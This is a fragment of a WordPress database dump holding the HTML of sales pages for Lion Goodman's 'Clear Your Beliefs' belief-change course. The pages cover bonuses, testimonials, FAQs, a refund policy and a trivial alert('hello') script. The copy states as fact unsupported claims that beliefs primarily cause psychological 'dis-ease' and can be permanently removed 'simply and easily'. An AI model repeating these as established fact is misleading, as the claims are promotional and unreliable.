src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {\r\n alert(''hello'');\r\n});\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:31:49', '2014-06-18 02:31:49', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1001, 4194, '2014-06-17 21:35:20', '2014-06-18 02:35:20', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially 